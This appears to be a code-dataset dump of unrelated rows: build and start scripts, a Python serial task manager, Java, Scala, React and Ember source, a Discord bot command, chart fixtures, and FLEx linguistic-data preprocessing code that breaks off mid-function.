text stringlengths 1 1.05M |
|---|
<reponame>axyjs/axy-define-asm
"use strict";
exports.runCLI = require("./lib/cli.js").runCLI;
exports.run = require("./lib/api.js").run;
|
#!/bin/bash
# Pull the latest Grafana image from Docker Hub.
# -x: echo each command as it runs; -e: abort on the first failure.
set -xe
sudo docker pull grafana/grafana
|
<filename>specs2/src/test/scala/org/http4s/specs2/SilenceOutputStream.scala<gh_stars>0
/*
* Copyright 2021 http4s.org
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.http4s.testing
import org.specs2.specification.AroundEach
import org.specs2.execute.{AsResult, Result}
import org.http4s.testing.ErrorReporting._
/** Wraps around each test and silences System.out and System.err output streams.
  * Restores back the original streams after each test case.
  */
trait SilenceOutputStream extends AroundEach {
  // Evaluate the example inside silenceOutputStreams so nothing it prints
  // reaches the real stdout/stderr; the helper restores the streams afterwards.
  def around[R: AsResult](r: => R): Result =
    silenceOutputStreams(AsResult(r))
}
|
import serial
import sys
import threading
import time
import argparse
import struct
import queue
class TaskManager:
    """Queues text tasks and sends each one to a device over a serial port.

    Tasks are processed concurrently: each dequeued task is handled in its
    own thread, which writes the task and reads one response line.
    """

    def __init__(self, serial_port):
        """Open the serial connection.

        serial_port -- device name, e.g. "/dev/ttyUSB0" or "COM3".
        NOTE(review): assumes the device speaks 9600 baud with a 1 s read
        timeout — confirm against the external device's settings.
        """
        self.serial_port = serial_port
        self.task_queue = queue.Queue()
        self.serial_connection = serial.Serial(serial_port, baudrate=9600, timeout=1)

    def add_task(self, task):
        """Enqueue a task (a string) for later processing."""
        self.task_queue.put(task)

    def process_tasks(self):
        """Consume tasks forever, handling each in its own thread.

        Fix: the original loop polled ``empty()`` then ``get()`` in a busy
        loop, which burned 100% CPU while idle and was racy if more than one
        consumer ever ran. A blocking ``get()`` does both correctly.
        """
        while True:
            task = self.task_queue.get()  # blocks until a task is available
            threading.Thread(target=self._process_task, args=(task,)).start()

    def _process_task(self, task):
        """Write the task to the serial device and print the response line."""
        try:
            self.serial_connection.write(task.encode())
            response = self.serial_connection.readline().decode()
            print(f"Task '{task}' processed. Response: {response}")
        except Exception as e:
            # Best-effort: report the failure and keep the manager running.
            print(f"Error processing task '{task}': {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Task Manager with Serial Communication')
parser.add_argument('port', help='Serial port to communicate with the external device')
args = parser.parse_args()
task_manager = TaskManager(args.port)
# Add tasks to the queue
task_manager.add_task("Task 1")
task_manager.add_task("Task 2")
task_manager.add_task("Task 3")
# Start processing tasks
task_manager.process_tasks() |
<reponame>nkmiura/mw2ape
package br.usp.poli.lta.nlpdep.execute.NLP.output;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.util.HashMap;
import java.util.LinkedList;
/**
 * Thread-safe registry of parse results, keyed by the ID of the worker thread
 * that produced them. Every public method is synchronized on this instance.
 */
public class NLPOutputList {
    private static final Logger logger = LoggerFactory.getLogger(NLPOutputList.class);
    // threadID -> accumulated output list / parse flag / thread handle
    private HashMap<Long, NLPOutputResult> outputResults;

    public NLPOutputList() {
        this.outputResults = new HashMap<>();
    }

    /**
     * Register an empty result entry for the given thread.
     * No-op (logged) if an entry already exists for that thread ID.
     */
    public synchronized void incrementOutputList (long threadID, Thread thread)
    {
        if (!this.outputResults.containsKey(threadID)) {
            NLPOutputResult newOutputResult = new NLPOutputResult();
            //newOutputResult.outputList = new LinkedList<>();
            //newOutputResult.parseResult = false;
            newOutputResult.setThread(thread);
            this.outputResults.put(threadID, newOutputResult);
            logger.debug("Iniciando resultados para thread {}",
                    String.valueOf(threadID));
        } else {
            logger.debug("Resultados já iniciados para o thread {}.",
                    String.valueOf(threadID));
        }
    }

    /**
     * Copy the output list of originalThreadID into a fresh entry for
     * newThreadID (deep-copies the list, so the entries do not share state).
     * No-op if the source entry is missing or the target entry already exists.
     */
    public synchronized void cloneOutputResult (long originalThreadID, long newThreadID) {
        if (this.outputResults.containsKey(originalThreadID)) {
            if (!this.outputResults.containsKey(newThreadID)) {
                NLPOutputResult newOutputResult = new NLPOutputResult();
                LinkedList<String> newOutputList = new LinkedList<>();
                newOutputList.addAll(this.outputResults.get(originalThreadID).getOutputList());
                newOutputResult.setOutputList(newOutputList);
                this.outputResults.put(newThreadID, newOutputResult);
                logger.debug("Clonando resultados do thread {} para thread {}.",
                        originalThreadID, newThreadID);
            }
        } else {
            logger.debug("Resultados não existentes para o thread {}.",
                    String.valueOf(originalThreadID));
        }
    }

    /**
     * Register nlpOutputResult's data under newThreadID, bound to the current
     * thread, with its parse flag reset to false. No-op (logged) if an entry
     * already exists for newThreadID.
     * NOTE(review): unlike the two-ID overload above, this version shares the
     * given output list rather than copying it (the copy loop is commented
     * out) — confirm callers expect shared list state.
     */
    public synchronized void cloneOutputResult (long newThreadID, NLPOutputResult nlpOutputResult) {
        if (!this.outputResults.containsKey(newThreadID)) { // a lista ainda não contem dados para a thread
            logger.debug("Clonando resultados para ThreadID {} # Dados: {}", newThreadID, String.valueOf(nlpOutputResult.getOutputList()));
            NLPOutputResult newOutputResult = new NLPOutputResult();
            LinkedList<String> newOutputList = new LinkedList<>();
            /*
            for (String listElement: nlpOutputResult.getOutputList()) {
                String newListElement = listElement;
                newOutputList.push(newListElement);
            } */
            Thread thread = Thread.currentThread();
            //newOutputList = (LinkedList) (nlpOutputResult.getOutputList()).clone();
            //newOutputList.addAll(nlpOutputResult.getOutputList());
            newOutputResult.setOutputList(nlpOutputResult.getOutputList());
            newOutputResult.setThread(thread);
            newOutputResult.setParseResult(false);
            this.outputResults.put(newThreadID, newOutputResult);
            logger.debug("Resultados clonados para ThreadId {} - Output list: {}", newThreadID,nlpOutputResult.getOutputList());
        } else {
            // NOTE(review): single {} placeholder but two extra arguments — the
            // second argument is ignored by the logger.
            logger.debug("Erro na clonagem de resultados. Já existem dados para a Thread Id {}.", newThreadID,
                    String.valueOf(nlpOutputResult.getOutputList()));
        }
    }

    /** Replace the entire backing map (takes ownership of the given map). */
    public synchronized void setOutputResults(HashMap<Long, NLPOutputResult> outputResults) {
        this.outputResults = outputResults;
    }

    /**
     * Append a partial result to the thread's output list.
     * @return true if the thread had an entry, false otherwise.
     */
    public synchronized boolean insertOutputResult (long threadId, String partialResult) {
        if (this.outputResults.containsKey(threadId)) {
            //logger.debug(" ### Insert output: ThreadId {} # Before: {} # String add: {}", threadId,
            //        outputResults.get(threadId).getOutputList(), partialResult);
            logger.debug(" ### Insert output: ThreadId {} # String to add: {}", threadId, partialResult);
            this.outputResults.get(threadId).getOutputList().addLast(partialResult);
            //logger.debug(" ### Insert output: ThreadId {} # Ater: {}", threadId,
            //        outputResults.get(threadId).getOutputList());
            return true;
        }
        else { return false; }
    }

    /** @return the live output list for the thread, or null if unregistered. */
    public synchronized LinkedList<String> getOutputResult (long threadID) {
        if (this.outputResults.containsKey(threadID)) {
            return this.outputResults.get(threadID).getOutputList();
        }
        else { return null; }
    }

    /** @return the number of registered threads. */
    public synchronized long getSize()
    {
        return this.outputResults.size();
    }

    /**
     * Replace the result entry for an already-registered thread.
     * @return true if the thread had an entry, false otherwise.
     */
    public synchronized boolean setOutputResult (long threadID, NLPOutputResult nlpOutputResult) {
        if (this.outputResults.containsKey(threadID)) {
            this.outputResults.put(threadID, nlpOutputResult);
            return true;
        }
        else { return false; }
    }

    /**
     * Set the success/failure flag for the thread's parse.
     * @return true if the thread had an entry, false otherwise.
     */
    public synchronized boolean setParseResult(long threadId, boolean result) {
        if (this.outputResults.containsKey(threadId)) {
            this.outputResults.get(threadId).parseResult = result;
            return true;
        }
        else { return false; }
    }

    /**
     * @return the thread's parse flag, or false if the thread is unregistered.
     * NOTE(review): parseResult appears to be a Boolean object (booleanValue()
     * is called) — this throws NPE if the flag was never set; confirm it is
     * always initialized before this is called.
     */
    public synchronized boolean getParseResult(long threadId) {
        if (this.outputResults.containsKey(threadId)) {
            return this.outputResults.get(threadId).parseResult.booleanValue();
        } else {
            return false;
        }
    }

    /** @return true if any registered worker thread is still alive. */
    public synchronized Boolean isAnyThreadAlive() {
        Boolean result = false;
        for (NLPOutputResult tempNLPOutputResult: this.outputResults.values()) {
            if (tempNLPOutputResult.getThread().isAlive()) {
                result = true;
                break;
            }
        }
        return result;
    }

    /** Debug rendering: entry count plus the output list of each successful parse. */
    @Override
    public String toString() {
        StringBuilder sb = new StringBuilder();
        sb.append("{ Qtd: ");
        // NOTE(review): the parenthesis placement makes String.valueOf wrap the
        // already-concatenated "size + newline" string; harmless, but probably
        // meant String.valueOf(outputResults.size()) + "\n".
        sb.append(String.valueOf(outputResults.size() + "\n"));
        this.outputResults.forEach(
                (threadID, outputResult) ->
                { if (outputResult.parseResult) {
                    sb.append("ThreadID " + String.valueOf(threadID) + ": ");
                    sb.append(outputResult.outputList.toString() + "\n");
                }
                }
        );
        sb.append('}');
        return sb.toString();
    }
}
|
<gh_stars>0
import {test} from 'qunit';
import moduleForAcceptance from '../../tests/helpers/module-for-acceptance';
import Sugar from 'ember-sugar-date';

moduleForAcceptance('Acceptance | when index');

// Acceptance test: visiting the index route should render the Sugar-formatted
// date for the en-CA locale into the marked element.
// NOTE(review): visit/andThen/currentURL/find are Ember acceptance-test
// helpers injected as globals by the test environment.
test('visiting /', function (assert) {
  visit('/');
  andThen(function () {
    assert.equal(currentURL(), '/');
    // Expected text: Sugar's "full" rendering of 2001-09-11 12:46:40 UTC
    // in Canadian English.
    assert.equal(find('.js-test-sugar-date-full-en-ca').text(),
      Sugar.Date.full(new Date(Date.UTC(2001, 8, 11, 12, 46, 40)), 'en-CA'));
  });
});
|
const { Message, MessageEmbed } = require("discord.js")
module.exports = {
name : 'hextostring',
description : 'tranlates hex do decimal',
execute(client, message, args) {
let hexString = args[0];
function hexToString(str)
{
const buf = new Buffer.from(str, 'hex');
return buf.toString('utf8');
}
let result = parseInt(hexString, 16);
result = result.toString();
if(result == 'NaN'){
message.reply("your hexadecimal input is invalid!");
return;
}
else{
message.channel.send("Decimal output: " + "`" + result + "`" + "\nString output: " + "`" + hexToString(hexString) + "`");
}
}
} |
#!/bin/bash
#
# Start script for company-appointments.api.ch.gov.uk
# Resolve the directory this script lives in (works regardless of CWD).
APP_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
# Two launch modes: local dev (env files under ~/.chs_env) vs Mesos, where the
# scheduler passes PORT/CONFIG_URL/ENVIRONMENT/APP_NAME as positional args and
# the env files are fetched from the config server.
if [[ -z "${MESOS_SLAVE_PID}" ]]; then
    source ~/.chs_env/private_env
    source ~/.chs_env/global_env
    source ~/.chs_env/company-appointments.api.ch.gov.uk/env
    PORT="${COMPANY_APPOINTMENTS_API_PORT}"
else
    PORT="$1"
    CONFIG_URL="$2"
    ENVIRONMENT="$3"
    APP_NAME="$4"
    source /etc/profile
    echo "Downloading environment from: ${CONFIG_URL}/${ENVIRONMENT}/${APP_NAME}"
    wget -O "${APP_DIR}/private_env" "${CONFIG_URL}/${ENVIRONMENT}/private_env"
    wget -O "${APP_DIR}/global_env" "${CONFIG_URL}/${ENVIRONMENT}/global_env"
    wget -O "${APP_DIR}/app_env" "${CONFIG_URL}/${ENVIRONMENT}/${APP_NAME}/env"
    source "${APP_DIR}/private_env"
    source "${APP_DIR}/global_env"
    source "${APP_DIR}/app_env"
fi
# Replace this shell with the JVM so signals reach the application directly.
exec java ${JAVA_MEM_ARGS} -jar -Dserver.port="${PORT}" "${APP_DIR}/company-appointments.api.ch.gov.uk.jar"
/* eslint-disable @typescript-eslint/no-unsafe-call */
/* eslint-disable @typescript-eslint/no-unsafe-assignment */
/* eslint-disable @typescript-eslint/ban-ts-comment */
/* eslint-disable react/prop-types */
// @ts-nocheck
import React from 'react';
import { Link } from '../../helpers';
import NavLinks from './nav-links';
import NavLogo from './nav-logo';
import './universal-nav.css';
/** Props for the site-wide navigation bar. */
export interface UniversalNavProps {
  /** Whether the collapsible nav menu is currently shown. */
  displayMenu?: boolean;
  /** Pending state of the user fetch; forwarded to NavLinks. */
  fetchState?: { pending: boolean };
  /** Click handler that shows/hides the menu; forwarded to NavLinks. */
  toggleDisplayMenu?: React.MouseEventHandler<HTMLButtonElement> | undefined;
  /** The signed-in user record, if any; forwarded to NavLinks. */
  user?: Record<string, unknown>;
}

/**
 * Site-wide navigation bar: the logo linking home plus the nav links.
 * Stateless — all state is owned by the parent and passed straight through.
 */
export const UniversalNav = ({
  displayMenu,
  toggleDisplayMenu,
  user,
  fetchState
}: UniversalNavProps): JSX.Element => {
  return (
    <nav className='nav-bar'>
      <Link id='' to='/'>
        <NavLogo />
      </Link>
      <NavLinks
        displayMenu={displayMenu}
        fetchState={fetchState}
        toggleDisplayMenu={toggleDisplayMenu}
        user={user}
      />
    </nav>
  );
};
UniversalNav.displayName = 'UniversalNav';
export default UniversalNav;
|
#!/bin/bash
# Generate a changelog with github-changelog-generator (run via Docker).
#
# Usage: <script> SINCE RELEASE [BRANCH] OUTFILE
# Requires GITHUB_TOKEN in the environment for GitHub API access.
SINCE=$1      # existing tag to start from (--since-tag)
RELEASE=$2    # upcoming release tag (--future-release)
BRANCH="${3:-$(git branch --show-current)}"  # release branch; defaults to the current branch
OUTFILE=$4    # output path, relative to the mounted working directory
docker run --rm=true -it -v "$(pwd)":/usr/local/src/your-app ferrarimarco/github-changelog-generator \
    --user pomerium --project pomerium \
    -o "${OUTFILE}" \
    --no-issues \
    --max-issues 500 \
    --usernames-as-github-logins \
    --release-branch "${BRANCH}" \
    --future-release "${RELEASE}" \
    --since-tag "${SINCE}" \
    --token "${GITHUB_TOKEN}" \
    --breaking-label "## Breaking" \
    --enhancement-label "## New" \
    --bugs-label "## Fixed" \
    --pr-label "## Changed" \
    --deprecated-label "## Deprecated" \
    --removed-label "## Removed" \
    --security-label "## Security" \
    --cache-file /usr/local/src/your-app/.cache \
    --enhancement-labels "improvement,Improvement, enhancement,Enhancement, feature" \
    --add-sections '{"documentation":{"prefix":"## Documentation","labels":["docs"]}, "dependency":{"prefix":"## Dependency","labels":["dependency"]}, "deployment":{"prefix":"## Deployment","labels":["deployment"]}}'
|
// days - number of days to add to the fixed reference date
// returns a Date that many days after 2015-01-01 12:00 (note DD/MM/YYYY format)
// NOTE(review): relies on a global `moment` provided by the fixture
// environment — confirm the harness injects it.
function newDateFromRef(days) {
  return moment('01/01/2015 12:00', 'DD/MM/YYYY HH:mm').add(days, 'd').toDate();
}

// Chart.js visual-test fixture: a line chart with a time-typed x axis.
module.exports = {
  threshold: 0.01, // allowed pixel-diff ratio for the image comparison
  config: {
    type: 'line',
    data: {
      // Unevenly spaced dates exercise the time scale's tick generation.
      labels: [newDateFromRef(0), newDateFromRef(1), newDateFromRef(2), newDateFromRef(4), newDateFromRef(6), newDateFromRef(7), newDateFromRef(9)],
      fill: false
    },
    options: {
      scales: {
        x: {
          type: 'time',
        },
        y: {
          display: false
        }
      }
    }
  },
  options: {
    spriteText: true,
    canvas: {width: 1000, height: 200}
  }
};
|
#!/bin/bash
# Launch a Flume agent with HTTP monitoring enabled.
# Expects FLUME_AGENT_NAME, FLUME_CONF_DIR, FLUME_CONF_FILE, FLUME_USER and
# FLUME_REPORTING_PORT in the environment (typically set by the container).
echo "Starting flume agent : ${FLUME_AGENT_NAME}"
# Print the effective configuration for debugging.
cat "${FLUME_CONF_FILE}"
# su-exec drops privileges to FLUME_USER before exec'ing flume-ng.
su-exec "${FLUME_USER}" flume-ng agent \
  -c "${FLUME_CONF_DIR}" \
  -f "${FLUME_CONF_FILE}" \
  -n "${FLUME_AGENT_NAME}" \
  -Dflume.root.logger=INFO,console \
  -Dflume.monitoring.type=http \
  -Dflume.monitoring.port="${FLUME_REPORTING_PORT}" \
  -DpropertiesImplementation=org.apache.flume.node.EnvVarResolverProperties
# Example request through the Vault proxy; __VAULT_PROXY_URL__ is a placeholder
# substituted by the caller, and $VGS_TOKEN is deliberately left unexpanded
# (single quotes) for the proxy to rewrite.
# NOTE(review): the doubled "\\" continuations suggest this snippet is embedded
# in another document/template — confirm the escaping before running directly.
curl https://backgroundcheck.yourcompany.com/post -k \\
-x __VAULT_PROXY_URL__ \\
-X POST \\
-H "Content-type: application/json" \\
-d '{"ssn": "$VGS_TOKEN"}'
|
<gh_stars>0
/*
Functions for processing flex files into the json format used by the site.
*/
const fs = require('fs');
const util = require('util');
const parseXml = require('xml2js').parseString;
const speakerRegistry = require('./speaker_registry').speakerRegistry;
const tierRegistry = require('./tier_registry').tierRegistry;
const helper = require('./helper_functions');
const flexUtils = require('./flex_utils');
// punct - a string
// True for punctuation that conventionally appears with a space before it
// but none after it (opening punctuation), e.g. "¿" or "(".
function isStartPunctuation(punct) {
  return ["¿", "("].includes(punct);
}
// char - a string
// True if FLEx uses 'char' as a morpheme separator.
function isSeparator(char) {
  return ["-", "=", "~"].includes(char);
}
// word - the data associated with a single word of the source text,
//   structured as in FLEx
// True if FLEx tagged the word as punctuation.
function isPunctuation(word) {
  const [firstItem] = word.item;
  return firstItem.$.type === "punct";
}
// metadata - a metadata object
// indexFilePath - filesystem path of the index JSON file
// storyID - unique identifier of the current interlinear text within the index
// Reads the index, replaces the entry for storyID (overwriting any previous
// metadata for it), and writes the index back pretty-printed.
function updateIndex(metadata, indexFilePath, storyID) {
  const rawIndex = fs.readFileSync(indexFilePath, "utf8");
  const index = { ...JSON.parse(rawIndex), [storyID]: metadata };
  fs.writeFileSync(indexFilePath, JSON.stringify(index, null, 2));
}
// morphsThisTier - morph tokens keyed by timeslot index,
//   where each morph token is an object structured as in FLEx
// wordStartSlot - the timeslot index of the first morph token within its sentence
// wordEndSlot - the timeslot index after the last morph token within its sentence
// Concatenates one word's morph values, inserting '+' between the parts of a
// compound word and restoring the '-' that FLEx omits on affix glosses.
// Missing morphs render as '***'.
function concatMorphs(morphsThisTier, wordStartSlot, wordEndSlot) {
  let wordMorphsText = '';
  let maybeAddCompoundSeparator = false; // never add a separator before the first word
  for (let i = wordStartSlot; i < wordEndSlot; i++) {
    let nextValue = '***';
    if (morphsThisTier[i] != null && morphsThisTier[i]['value'] != null) {
      nextValue = morphsThisTier[i]["value"];
      // insert missing '-' if needed (FLEX seems to omit them in glosses of affixes)
      if (morphsThisTier[i]["tier type"] === 'gls') {
        if (morphsThisTier[i]["part of speech"] === 'prefix') {
          nextValue = nextValue + '-';
        } else if (morphsThisTier[i]["part of speech"] === 'suffix') {
          nextValue = '-' + nextValue;
        }
      }
    }
    // insert compound-word separator if needed
    if (maybeAddCompoundSeparator && !isSeparator(nextValue.substring(0, 1))) {
      wordMorphsText += '+';
    }
    // BUG FIX: the original used nextValue.substring(-1), which clamps the
    // negative index to 0 and returns the WHOLE string, so the "ends with a
    // separator" test only matched values that were exactly one separator
    // character. slice(-1) inspects the actual last character.
    if (!isSeparator(nextValue.slice(-1))) {
      maybeAddCompoundSeparator = true;
    }
    wordMorphsText += nextValue;
  }
  return wordMorphsText;
}
// word - the data associated with a single word of the source text,
//   structured as in FLEx
// Decide how this word participates in sentence concatenation:
//   'txt'   - an ordinary word
//   'start' - opening punctuation (space before, none after)
//   'end'   - closing punctuation (no space before)
function getSentenceToken(word) {
  const wordValue = flexUtils.getWordValue(word);
  if (!isPunctuation(word)) {
    return { 'value': wordValue, 'type': 'txt' };
  }
  const type = isStartPunctuation(wordValue) ? 'start' : 'end';
  return { 'value': wordValue, 'type': type };
}
// sentenceTokens - a list of {value, type} objects, each indicating how to
//   represent one word within the sentence text
// Joins the tokens into a sentence string with conventional spacing: no space
// after 'start' punctuation and no space before 'end' punctuation.
function concatWords(sentenceTokens) {
  const pieces = [];
  let previousAllowsSpace = false; // no space before the first word
  for (const token of sentenceTokens) {
    if (previousAllowsSpace && token.type !== "end") {
      pieces.push(" ");
    }
    previousAllowsSpace = (token.type !== "start");
    pieces.push(token["value"]);
  }
  return pieces.join("");
}
// morphsJson - tierID -> start_slot -> {value, end_slot}, describing the
//   morph tokens in a sentence
// Flattens the per-tier morph map into the list-of-tiers shape used by the
// website: [{tier, values: [{start_slot, end_slot, value}, ...]}, ...]
function getDependentsJson(morphsJson) {
  return Object.keys(morphsJson).map((tierID) => {
    const valuesJson = Object.entries(morphsJson[tierID]).map(
      ([startSlot, token]) => ({
        "start_slot": parseInt(startSlot, 10),
        "end_slot": token["end_slot"],
        "value": token["value"]
      })
    );
    return { "tier": tierID, "values": valuesJson };
  });
}
// FLEx structures morph information by morpheme, so that for example,
// the citation form is clearly associated with all other info about the same
// morpheme, but not clearly associated with the citation forms of other morphs.
// This function repackages the information by type to make it useful for the website.
// morphs - a list of objects describing each morpheme in a part of the source text,
//   structured according to FLEx's data format
// tierReg - a tierRegistry object
// startSlot - the timeslot index of the first morpheme within its sentence
// returns an object describing the morphemes, in which descriptors have been
// categorized into "tiers" by information type (e.g. citation form or gloss),
// shaped as tierID -> startSlot -> {value, end_slot}
function repackageMorphs(morphs, tierReg, startSlot) {
  // FLEx packages morph items by morpheme, not by type.
  // We handle this by first re-packaging all the morphs by type(a.k.a. tier),
  // then concatenating all the morphs of the same type.
  // Repackaging step:
  const morphTokens = {};
  let slotNum = startSlot; // advances once per morpheme; shared by all tiers
  for (const morph of morphs) {
    for (const tier of flexUtils.getMorphTiers(morph)) {
      // maybeRegisterTier returns null for tiers the registry rejects;
      // those descriptors are dropped.
      const tierID = tierReg.maybeRegisterTier(tier.$.lang, tier.$.type, true);
      if (tierID != null) {
        if (!morphTokens.hasOwnProperty(tierID)) {
          morphTokens[tierID] = {};
        }
        // Keep tier type and part of speech so concatMorphs can restore
        // the '-' FLEx omits on affix glosses.
        morphTokens[tierID][slotNum] = {
          "value": flexUtils.getMorphTierValue(tier),
          "tier type": tier.$.type,
          "part of speech": flexUtils.getMorphPartOfSpeech(morph),
        };
      }
    }
    slotNum++;
  }
  // Concatenating step: one combined entry per tier spanning
  // [startSlot, slotNum).
  let morphsJson = {};
  for (const tierID in morphTokens) {
    if (morphTokens.hasOwnProperty(tierID)) {
      if (!morphsJson.hasOwnProperty(tierID)) {
        morphsJson[tierID] = {};
      }
      morphsJson[tierID][startSlot] = {
        "value": concatMorphs(morphTokens[tierID], startSlot, slotNum),
        "end_slot": slotNum
      };
    }
  }
  return morphsJson;
}
// dest - an object with all its values nested two layers deep
// src - an object with all its values nested two layers deep
// Copies every inner value of src into dest under the same outer/inner keys,
// keeping existing dest values except those src directly overwrites.
// Mutates dest in place.
function mergeTwoLayerDict(dest, src) {
  for (const [outerKey, innerDict] of Object.entries(src)) {
    if (!Object.prototype.hasOwnProperty.call(dest, outerKey)) {
      dest[outerKey] = {};
    }
    for (const [innerKey, value] of Object.entries(innerDict)) {
      dest[outerKey][innerKey] = value; // overwrites dest[outerKey][innerKey]
    }
  }
}
// freeGlosses - a list of objects describing the free glosses for a sentence,
//   structured as in the FLEx file
// tierReg - a tierRegistry object
// endSlot - the timeslot index of the end of the sentence
// Returns tierID -> 0 -> {value, end_slot}: each free gloss spans the whole
// sentence on its own tier. Glosses whose tier the registry rejects are dropped.
function repackageFreeGlosses(freeGlosses, tierReg, endSlot) {
  const glossStartSlot = 0; // a free gloss always starts at the sentence start
  const morphsJson = {};
  for (const gloss of freeGlosses) {
    const tierID = tierReg.maybeRegisterTier(gloss.$.lang, "free", false);
    if (tierID == null) {
      continue;
    }
    if (!morphsJson.hasOwnProperty(tierID)) {
      morphsJson[tierID] = {};
    }
    morphsJson[tierID][glossStartSlot] = {
      "value": flexUtils.getFreeGlossValue(gloss),
      "end_slot": endSlot
    };
  }
  return morphsJson;
}
// sentence - an object describing a sentence of source text,
//   structured as in the FLEx file
// speakerReg - a map from speaker names to speaker IDs, which we'll add to if we find a new speaker
// tierReg - a tierRegistry object
// wordsTierID - the ID which has been assigned to the words tier
// hasTimestamps - whether the FLEx file contains a start and end value for each sentence
// returns an object describing the sentence,
// structured correctly for use by the website
function getSentenceJson(sentence, speakerReg, tierReg, wordsTierID, hasTimestamps) {
  const morphsJson = {}; // tierID -> start_slot -> {"value": value, "end_slot": end_slot}
  morphsJson[wordsTierID] = {}; // FIXME words tier will show up even when the sentence is empty of words
  let slotNum = 0; // running timeslot counter across the whole sentence
  const sentenceTokens = []; // for building the free transcription
  for (const word of flexUtils.getSentenceWords(sentence)) {
    const wordStartSlot = slotNum; // remember where this word's morphs begin
    // deal with the morphs that subdivide this word
    const morphs = flexUtils.getWordMorphs(word);
    const newMorphsJson = repackageMorphs(morphs, tierReg, slotNum);
    mergeTwoLayerDict(morphsJson, newMorphsJson);
    slotNum += morphs.length;
    if (morphs.length === 0 && !isPunctuation(word)) {
      slotNum++; // if a non-punctuation word has no morphs, it still takes up a slot
    }
    // deal with the word itself
    if (!isPunctuation(word)) {
      // count this as a separate word on the words tier
      // (punctuation never appears on the words tier)
      morphsJson[wordsTierID][wordStartSlot] = {
        "value": flexUtils.getWordValue(word),
        "end_slot": slotNum
      };
    }
    // deal with sentence-level transcription
    sentenceTokens.push(getSentenceToken(word));
  }
  // deal with free glosses: each spans the full sentence [0, slotNum)
  const freeGlosses = flexUtils.getSentenceFreeGlosses(sentence);
  const freeGlossesJson = repackageFreeGlosses(freeGlosses, tierReg, slotNum);
  mergeTwoLayerDict(morphsJson, freeGlossesJson);
  // prefer the explicit sentence text if FLEx stored one; otherwise rebuild
  // it from the word tokens with correct punctuation spacing
  let sentenceText = flexUtils.getSentenceTextIfNoWords(sentence);
  if (sentenceText == null) {
    sentenceText = concatWords(sentenceTokens)
  }
  let sentenceJson = {
    "num_slots": slotNum,
    "text": sentenceText,
    "dependents": getDependentsJson(morphsJson),
  };
  if (hasTimestamps) {
    sentenceJson.start_time_ms = flexUtils.getSentenceStartTime(sentence);
    sentenceJson.end_time_ms = flexUtils.getSentenceEndTime(sentence);
  }
  let speaker = flexUtils.getSentenceSpeaker(sentence);
  if (speaker != null) {
    speakerReg.maybeRegisterSpeaker(speaker); // no-op if already known
    sentenceJson.speaker = speakerReg.getSpeakerID(speaker);
  }
  return sentenceJson;
}
// jsonIn - the JSON parse of the FLEx interlinear-text
// jsonFilesDir - the directory for the output file describing this interlinear text
// fileName - TODO delete unused parameter
//   (still forwarded to helper.improveFLExIndexData below)
// isoDict - an object correlating languages with ISO codes
// callback - the function that will execute when the preprocessText function completes
// updates the index and story files for this interlinear text,
// then executes the callback
function preprocessText(jsonIn, jsonFilesDir, fileName, isoDict, callback) {
  let storyID = jsonIn.$.guid; // the FLEx GUID doubles as the story's file name
  let metadata = helper.improveFLExIndexData(fileName, storyID, jsonIn);
  const speakerReg = new speakerRegistry();
  metadata['speakers'] = speakerReg.getSpeakersList();
  // NOTE(review): the index path is hard-coded relative to the process CWD.
  updateIndex(metadata, "data/index.json", storyID);
  const jsonOut = {
    "metadata": metadata,
    "sentences": []
  };
  let textLang = flexUtils.getDocumentSourceLang(jsonIn);
  const tierReg = new tierRegistry(isoDict);
  const wordsTierID = tierReg.maybeRegisterTier(textLang, "words", true);
  const hasTimestamps = flexUtils.documentHasTimestamps(jsonIn);
  for (const paragraph of flexUtils.getDocumentParagraphs(jsonIn)) {
    for (const sentence of flexUtils.getParagraphSentences(paragraph)) {
      jsonOut.sentences.push(getSentenceJson(sentence, speakerReg, tierReg, wordsTierID, hasTimestamps));
    }
  }
  // tier/speaker IDs are only known after every sentence has been processed
  jsonOut.metadata['tier IDs'] = tierReg.getTiersJson();
  jsonOut.metadata['speaker IDs'] = speakerReg.getSpeakersJson();
  const prettyString = JSON.stringify(jsonOut, null, 2);
  const jsonPath = jsonFilesDir + storyID + ".json";
  fs.writeFile(jsonPath, prettyString, function (err) {
    if (err) {
      // NOTE(review): the error is logged but the callback is skipped, so a
      // failed write silently stalls the caller's completion counting.
      console.log(err);
    } else {
      // console.log("✅ Correctly wrote " + storyID + ".json");
      if (callback != null) {
        callback();
      }
    }
  });
}
// xmlFilesDir - a directory containing zero or more FLEx files
// jsonFilesDir - a directory for output files describing individual interlinear texts
// isoFileName - the file address of a JSON object matching languages to their ISO codes
// callback - the function that will execute when the preprocess_dir function completes
// updates the index and story files for each interlinear text,
// then executes the callback
function preprocess_dir(xmlFilesDir, jsonFilesDir, isoFileName, callback) {
  let isoDict = {};
  try {
    isoDict = JSON.parse(fs.readFileSync(isoFileName));
  } catch (err) {
    // best-effort: ISO codes only enrich tier labels, so keep going
    console.log("Unable to read ISO codes file. Error was " + err + " Proceeding anyway...");
  }
  const xmlFileNames = fs.readdirSync(xmlFilesDir).filter(f => f[0] !== '.'); // excludes hidden files
  // use this to wait for all preprocess calls to terminate before executing the callback
  const status = {numJobs: xmlFileNames.length};
  if (xmlFileNames.length === 0) {
    callback();
    return; // nothing to process; don't fall through to the loop
  }
  const whenDone = function () {
    status.numJobs--;
    if (status.numJobs <= 0) {
      callback();
    }
  };
  for (const xmlFileName of xmlFileNames) {
    console.log("Processing " + xmlFileName);
    const xmlPath = xmlFilesDir + xmlFileName;
    fs.readFile(xmlPath, function (err1, xmlData) {
      if (err1) throw err1;
      parseXml(xmlData, function (err2, jsonData) {
        if (err2) throw err2;
        // BUG FIX: a document with no interlinear texts (missing key or empty
        // list) previously left singleFileStatus.numJobs at 0 with no
        // callbacks scheduled, so whenDone() never fired and the overall
        // callback hung forever.
        const texts = jsonData['document']['interlinear-text'] || [];
        // wait for all preprocessText calls to terminate before executing whenDone
        const singleFileStatus = {numJobs: texts.length};
        const singleTextCallback = function () {
          singleFileStatus.numJobs--;
